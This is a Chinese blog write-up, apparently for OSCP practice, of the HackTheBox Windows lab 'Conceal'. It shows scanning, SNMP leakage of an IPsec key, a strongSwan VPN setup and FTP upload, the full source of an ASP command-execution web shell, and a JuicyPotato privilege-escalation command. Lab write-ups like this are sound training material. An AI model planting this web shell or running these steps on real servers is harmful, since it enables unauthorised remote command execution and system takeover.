OSCP备考_0x47_HackThBox靶机_Windows_conceal

Ethan医生2周前靶场22

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.122 (扫描TCP)

image.png

我们普通的tcp啥都没有,所以考虑udp扫描
当然也有可能是防火墙,但这么严格的防火墙应该不会出现在练习上

nmap -sU --top-ports 100 10.129.228.122 (扫描UDP)

image.png

snmp可以枚举,isakmp常用来做内部vpn的一个验证口

获取到有snmap端口出来


nmap -sU -p 161 -sV -sC 10.129.228.122

image.png

然后就是使用snmp进行详细扫描

snmpwalk -v1 -c public 10.129.228.122 

image.png

发现存在一个psk,psk是md5格式

在这里插入图片描述

解密后Dudecake1!

使用这个去登入


ike-scan 10.129.228.122 -M

image.png

注意看sa部分的几个参数
我们这里需要更改两个文件,就是下面这两个

/etc/ipsec.conf和 /etc/ipsec.secrets

修改完了连接即可

ipsec restart 

ipsec up conceal 



/etc/ipsec.secrets

image.png



ipsec.conf中写入双方IP、加密模式以及模式类型等

config setup    charondebug="all"    uniqueids=yes    strictcrlpolicy=no     conn conceal    authby=secret    auto=route    keyexchange=ikev1    ike=3des-sha1-modp1024    left=10.10.16.43    right=10.129.228.122    type=transport    esp=3des-sha1    rightprotoport=tcp

配置完成后开始连接 IPsec V\P\N

ipsec restart

ipsec up conceal


apt-get install libstrongswan-standard-plugins libstrongswan-extra-plugins ---需要安装扩展


再次启动成功连接到V\P\N

image.png


端口探测

连上 V\P\N 后我们需要再次使用 nmap 进行端口扫描

nmap -sT -p- -sV -sC --open --min-rate 10000 -oA nmap_Conceal_V\P\N 10.129.228.122


image.png


使用FTP


image.png


image.png

上传后访问404,访问还是存在问题,可能是因为服务端对执行函数进行了检查,于是上传下面这个简单的木马

image.png

需要上传些不敏感的使用

<!-- ASP Webshell Working on latest IIS Referance :- https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script http://www.w3schools.com/asp/ --> <% Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") Function getCommandOutput(theCommand)    Dim objShell, objCmdExec    Set objShell = CreateObject("WScript.Shell")    Set objCmdExec = objshell.exec(thecommand)    getCommandOutput = objCmdExec.StdOut.ReadAll end Function %> <HTML> <BODY> <FORM action="" method="GET"> <input type="text" name="cmd" size=45 value="<%= szCMD %>"> <input type="submit" value="Run"> </FORM> <PRE> <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> <%Response.Write(Request.ServerVariables("server_name"))%> <p> <b>The server's port:</b> <%Response.Write(Request.ServerVariables("server_port"))%> </p> <p> <b>The server's software:</b> <%Response.Write(Request.ServerVariables("server_software"))%> </p> <p> <b>The server's software:</b> <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> <% szCMD = request("cmd") thisDir = getCommandOutput("cmd /c" & szCMD) Response.Write(thisDir)%> </p> </BODY> </HTML>

image.png


访问木马地址后成功反弹shell


权限提升[system]

JuicyPotato.exe -p C:\users\Destitute\appdata\local\temp\rev.bat -l 1340 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

标签: OSCP

相关文章

OSCP备考_0x28_HackThBox靶机_Linux_blunder

OSCP备考_0x28_HackThBox靶机_Linux_blunder

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x34_HackThBox靶机_time

OSCP备考_0x34_HackThBox靶机_time

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。